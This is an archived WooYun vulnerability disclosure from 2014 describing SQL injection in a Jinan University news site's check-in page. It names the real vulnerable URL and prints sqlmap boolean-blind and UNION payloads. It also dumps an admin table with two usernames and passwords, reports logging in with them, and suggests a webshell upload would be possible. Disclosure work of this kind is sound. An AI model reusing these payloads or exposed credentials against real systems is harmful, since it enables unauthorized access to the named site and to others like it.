乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-24: 细节已通知厂商并且等待厂商处理中 2014-11-29: 厂商已经主动忽略漏洞,细节向公众公开
RT
注入点:
http://jnnews.jnu.edu.cn/qiandao/AttendList.asp?id=292 --tables
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=183 AND 7979=7979 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-8197 UNION ALL SELECT CHR(113)&CHR(98)&CHR(106)&CHR(112)&CHR(113)&CHR(98)&CHR(101)&CHR(116)&CHR(65)&CHR(76)&CHR(104)&CHR(114)&CHR(85)&CHR(101)&CHR(77)&CHR(113)&CHR(118)&CHR(98)&CHR(122)&CHR(113),NULL,NULL FROM MSysAccessObjects%16---[00:22:23] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access[00:22:23] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'[00:22:25] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'[00:22:25] [INFO] retrieved: [00:22:28] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'[00:22:28] [ERROR] cannot retrieve table names, back-end DBMS is AccessDatabase: Microsoft_Access_masterdb[1 table]+-------+| admin |+-------+
Database: Microsoft_Access_masterdbTable: admin[4 columns]+----------+-------------+| Column | Type |+----------+-------------+| data | non-numeric || id | numeric || passwd | non-numeric || username | non-numeric |+----------+-------------+
Database: Microsoft_Access_masterdbTable: admin[2 entries]+----+------+-------------+---------------+| id | data | passwd | username |+----+------+-------------+---------------+| 26 | <blank> | xcb85228862 | liangbinadmin || 29 | <blank> | wenhuasuzhi | wehhuasuzhi |+----+------+-------------+---------------+
登陆上面的账户
http://jnnews.jnu.edu.cn/qiandao/index2.asp
IIS 6.0的话应该可以上传个webshell,点到为止吧
过滤,修改密码
危害等级:无影响厂商忽略
忽略时间:2014-11-29 15:48
暂无